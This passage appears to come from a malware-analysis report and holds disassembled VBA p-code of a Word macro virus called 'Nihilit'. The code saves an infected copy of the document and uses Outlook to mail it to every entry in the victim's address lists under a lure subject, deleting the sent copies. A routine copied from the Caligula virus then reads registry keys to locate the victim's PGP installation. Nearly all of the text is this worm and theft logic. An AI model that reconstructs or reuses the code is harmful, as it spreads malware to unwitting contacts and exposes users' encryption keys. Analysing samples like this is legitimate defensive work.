' LitStr 0x0016 "C:\Windows\Nihilit.doc"
' ParamNamed FileName
' Ld wdFormatDocument
' ParamNamed FileFormat
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0002
' Line #93:
' SetStmt
' LitStr 0x0013 "Outlook.Application"
' ArgsLd CreateObject 0x0001
' Set Ni_OApp
' Line #94:
' SetStmt
' LitStr 0x0004 "MAPI"
' Ld Ni_OApp
' ArgsMemLd GetNameSpace 0x0001
' Set Ni_Mapi
' Line #95:
' StartForVariable
' Ld Ni_AddList
' EndForVariable
' Ld Ni_Mapi
' MemLd AddressLists
' ForEach
' Line #96:
' StartForVariable
' Next
' Line #97:
' Ld Ni_AddList
' MemLd AddressEntries
' MemLd Count
' LitDI2 0x0000
' Ne
' IfBlock
' Line #98:
' StartForVariable
' Ld Ni_AddListCount
' EndForVariable
' LitDI2 0x0001
' Ld Ni_AddList
' MemLd AddressEntries
' MemLd Count
' For
' Line #99:
' StartForVariable
' Next
' Line #100:
' SetStmt
' Ld Ni_AddListCount
' Ld Ni_AddList
' ArgsMemLd AddressEntries 0x0001
' Set Ni_AddListEntry
' Line #101:
' SetStmt
' LitDI2 0x0000
' Ld Ni_OApp
' ArgsMemLd CreateItem 0x0001
' Set Ni_msg
' Line #102:
' Ld Ni_AddListEntry
' MemLd Address
' Ld Ni_msg
' MemSt To
' Line #103:
' LitStr 0x000D "Check this!!!"
' Ld Ni_msg
' MemSt Subject
' Line #104:
' LitStr 0x0018 "I like this story!!!;o)."
' Ld vbCrLf
' Add
' LitStr 0x0007 "Nihilit"
' Add
' Ld Ni_msg
' MemSt Body
' Line #105:
' LitStr 0x0006 "WINDIR"
' ArgsLd Environ 0x0001
' LitStr 0x000C "\Nihilit.doc"
' Concat
' Ld Ni_msg
' MemLd Attachments
' ArgsMemCall Add 0x0001
' Line #106:
' LitVarSpecial (True)
' Ld Ni_msg
' MemSt DeleteAfterSubmit
' Line #107:
' Ld Ni_msg
' MemLd To
' LitStr 0x0000 ""
' Ne
' IfBlock
' Line #108:
' Ld Ni_msg
' ArgsMemCall Send 0x0000
' Line #109:
' EndIfBlock
' Line #110:
' EndIfBlock
' Line #111:
' EndSub
' Line #112:
' Line #113:
' FuncDefn (Sub Pgp())
' Line #114:
' OnError (Resume Next)
' Line #115:
' QuoteRem 0x0000 0x0033 "taken from W97M/Caligula Virus by Opic/CodeBreakers"
' Line #116:
' LitStr 0x0000 ""
' LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info"
' LitStr 0x0007 "Nihilit"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitVarSpecial (False)
' Eq
' Paren
' IfBlock
' Line #117:
' LitStr 0x0000 ""
' LitStr 0x0037 "HKEY_CLASSES_ROOT\PGP Encrypted File\shell\open\command"
' LitStr 0x0000 ""
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' St pgppath
' Line #118:
' LitDI2 0x0001
' Ld pgppath
' LitStr 0x0004 "pgpt"
' FnInStr3
' St Position
' Line #119:
' Line #120:
' Ld Position
' LitDI2 0x0000
' Ne
' IfBlock
' Line #121:
' Ld pgppath
' LitDI2 0x0001
' Ld Position
' LitDI2 0x0002
' Sub
' ArgsLd Mid 0x0003
' St pgppath
' Line #122:
' ElseBlock
' Line #123:
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.